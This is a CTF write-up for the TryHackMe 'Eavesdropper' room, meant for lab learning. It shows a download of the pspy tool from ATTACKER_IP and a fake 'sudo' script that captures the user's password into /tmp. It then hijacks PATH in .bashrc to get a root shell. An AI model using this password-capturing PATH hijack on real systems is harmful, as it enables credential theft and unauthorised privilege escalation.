🕵️Eavesdropper - CTF Write-Up - TryHackme
Listen closely and you might hear a password!

Room Link : https://tryhackme.com/room/eavesdropper
Enumeration
As the room's title suggests, our objective is to eavesdrop in order to obtain the password. I've explored various common enumeration methods within this room, testing different ways to exploit it—while some approaches showed promise, most did not yield the desired results.
To keep this write-up concise, let's dive right in. Our initial step involves checking for running processes.
ps -aux
# Output would be something like this
frank@workstation:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 1.0 1.4 12172 7220 ? Ss 16:48 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 69 2.2 1.8 13580 8948 ? Ss 16:49 0:00 sshd: frank [priv]
frank 105 0.0 1.0 13904 5228 ? S 16:49 0:00 sshd: frank@pts/0
frank 107 0.1 0.8 5992 3860 pts/0 Ss 16:49 0:00 -bash
frank 115 0.0 0.6 7644 3280 pts/0 R+ 16:49 0:00 ps aux
Upon examining the situation, it becomes evident that there's another SSH process running with elevated privileges. To monitor this process discreetly, we will employ the 'pspy' tool. Follow these steps:
Download the 'pspy' tool from the following link: Releases · DominicBreuker/pspy.
Once downloaded, proceed to deploy the tool for further investigation.
# Start a webserver where you have downloaded the pspy binary
python -m http.server 8080
# Change to /tmp dir
cd /tmp
# deploy pspy64
curl http://ATTACKER_IP:8080/pspy64 -o pspy
# Provide permission to execute
chmod +x pspy
While monitoring the processes, focus on those with the UID=0, as they are typically root processes. Look for any relevant details in these processes.

sudo cat /etc/shadow
To obtain the password, we must hijack the process. It's worth noting that "sudo" is being called via a relative path.
Here's the concept:
By altering the value in the path variable and creating our own "sudo" command, we can hijack the process. Let's proceed with the coding steps.
# Change to /tmp dir
# Create a file called sudo
# Enter the following contents
#!/bin/bash
read -p "Password : " pass
echo $pass > /tmp/password
Now provide executable permission
chmod +x /tmp/sudo
Exploitation
Finally change the PATH variable inside .bashrc file in /home/frank, one thing to note is that you need to enter this path as the first line in .bashrc file

PATH=/tmp:$PATH
Log out of the current SSH session.
Log back in; you should now have the password.
Once logged in, comment out the PATH variable from the
bashrc
file.Log out again.
Log back in to obtain a root shell.

# type the following command to get root
sudo -i

Provide the password, and you will have the root shell.
# Get the flag
cat /root/flag.txt

I hope you had fun, learning new stuff ☺️ ❤️
Last updated
Was this helpful?